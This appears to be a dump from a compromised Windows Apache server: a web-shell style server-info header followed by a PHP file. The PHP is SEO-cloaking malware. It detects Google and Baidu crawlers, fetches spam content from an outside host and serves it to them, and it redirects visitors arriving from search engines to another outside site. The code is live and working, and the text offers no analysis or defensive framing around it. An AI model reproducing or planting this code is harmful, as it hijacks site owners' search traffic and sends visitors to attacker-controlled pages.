Server : Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 System : Windows NT USER-PC 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) AMD64 User : User ( 0) PHP Version : 7.4.6 Disable Function : NONE Directory : C:/www/ |
<?php set_time_limit(0);error_reporting(0); header('Content-Type:text/html;charset=utf-8');$key= $_SERVER["_ref_USER_AGENT"];if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false){ $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; $file = file_get_contents('http://cc.fghuhany.top/'."/index.php?host=".$host_name."&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']); echo $file;}$httpuser=strtolower($_SERVER['HTTP_REFERER']);if(strstr($httpuser,'google') or strstr($httpuser,'baidu') or strstr($httpuser,'HaosouSpider')){Header("Location: https://kyleyu.top/xx.html");exit; }?>